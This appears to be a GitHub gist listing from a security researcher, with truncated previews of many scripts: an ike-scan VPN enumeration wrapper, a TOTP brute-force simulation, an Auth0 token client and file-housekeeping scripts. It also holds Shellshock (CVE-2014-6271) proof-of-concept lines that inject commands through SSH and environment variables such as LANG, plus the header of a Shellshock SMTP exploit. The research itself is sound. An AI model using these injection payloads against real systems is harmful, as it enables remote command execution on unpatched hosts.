This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# An quick and dirty ike-scan wrapper to enumerate | |
# supported transform sets and vendor ID fingerprints | |
# on IPSec VPN Endpoints. | |
# | |
# Example Targeted Run Output | |
# | |
#$ rvmsudo ruby harvest.rb --targets 192.168.1.1 --enc-types 5 --hash-types 2 --dh-types 2 --auth-types 1 | |
#I, [2013-08-12T23:53:14.490138 #27197] INFO -- : 5 transform combinations to try | |
#D, [2013-08-12T23:53:14.490221 #27197] DEBUG -- : Trying ike-scan --multiline 192.168.1.1 | |
#I, [2013-08-12T23:53:14.726363 #27197] INFO -- : Found a new VID VID=5b362bc820f60001 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$ worm parse 01000000020d03632733cadb4398deff53e35fd7255296df9f5a8b8099c701d18fe4328d89351a1da6913276ad8f806f254e13816209e05d68fba914f7a74afa732a0abc56c4a50105aeb171934c5b3336db4ca2ff1dec200798ab0fc554520f2b12a7822684568d8a0de8a5115ae00476aad2607f29e30a559429f66f331d30e281b4f30ad7e799970106aab251c07774ad4d1d2dc4b3657e2b91d43dd41e54b4164dea9b025515d537334d68899e00ef494d54bc3cd6948655b61a8eec1bceebf907e2ab18c0ece009ac01077607cf7e024f2525071b4ecef46060ee23fb1d3ea5e5ed7ea00f44676391719466c071e2facfa35aa364b9c3aba5beb5c1f80b28b38aaef5e9d0f64cc81e2b4f0109ab9995885cb1603ea880323d22ce17752c05f5fb9b0631d1f48552e53f3afa9d3b8097faec35e907be7637543b59db2869bebcf2cda1151f4bf8c2a342e0fd24010a5fc9061809cf2ff11d4d50d3e9d55a0168d6ca4520802d81e5e5fb83af3dbbff297fe42b2e2a2678cbcfc049a99554859ef5046886c6bcb56f2705c44ea7f22c010b6c4e79c796094ec80b096bb495e54d21852a6194d4c35903e25705b97cecdd622cc1e7b4e9a9556a04ef3b255426703e3bc885873e64b0b8fa193f9fd8370c74010c70d7c1940647960e88fb5fe891012567d22394ae99c3beccc9a49b10e70223353e876d510 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Almost Original SSH PoC for CVE-2014-6271 (Ref: http://seclists.org/oss-sec/2014/q3/651) | |
ssh claudijd@192.168.10.105 '() { ignored; }; /usr/bin/id' | |
Note: this pollutes the SSH_ORIGINAL_COMMAND env variable, but what about vars we can set? | |
# Alterative SSH PoC Injection Points for CVE-2014-6271 | |
LANG='() { ignored; }; /usr/bin/id' ssh claudijd@192.168.10.105 | |
LC_NUMERIC='() { ignored; }; /usr/bin/id' ssh claudijd@192.168.10.105 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
>> require 'socket' | |
=> true | |
>> require 'openssl' | |
=> true | |
>> | |
?> ssl_context = OpenSSL::SSL::SSLContext.new | |
=> #<OpenSSL::SSL::SSLContext:0x007ffc9a9deb00> | |
>> ssl_context.verify_mode = OpenSSL::SSL::VERIFY_PEER | |
=> 1 | |
>> cert_store = OpenSSL::X509::Store.new |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import json | |
import requests | |
import pdb | |
import os | |
BASE_URL = "https://auth.mozilla.auth0.com" | |
def get_bearer_token(): | |
url = BASE_URL + '/oauth/token' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# A proof of concept to demonstrate TOTP bruteforcing concepts | |
# Parameters to control simulation behavior### | |
request_rate = 4 | |
totp_validity_window = 90 #in seconds | |
totp_guesses_per_auth_session = request_rate * totp_validity_window # number of totp guesses per auth session | |
simulated_logins = 100 # number of simulated logins to help determine average rate of TOTP collision | |
############################################## | |
# Helper Methods |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/python | |
# Exploit Title: Shellshock SMTP Exploit | |
# Date: 10/3/2014 | |
# Exploit Author: fattymcwopr | |
# Vendor Homepage: gnu.org | |
# Software Link: http://ftp.gnu.org/gnu/bash/ | |
# Version: 4.2.x < 4.2.48 | |
# Tested on: Debian 7 (postfix smtp server w/procmail) | |
# CVE : 2014-6271 | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
log = open("/Users/jclaudius/.aws/config", "r") | |
for line in log: | |
print(line) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import glob | |
import os | |
import os.path | |
import shutil | |
mydir = "/Users/jclaudius/Downloads/" | |
filelist = glob.glob(os.path.join(mydir, "*")) | |
for f in filelist: | |
if os.path.isdir(f): |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import os | |
import shutil | |
path = "/Users/jclaudius/Desktop/" | |
moveto = "/Users/jclaudius/Desktop/Archive/" | |
files = os.listdir(path) | |
files.sort() | |
for f in files: | |
if not os.path.isdir(f): | |
src = path+f |
NewerOlder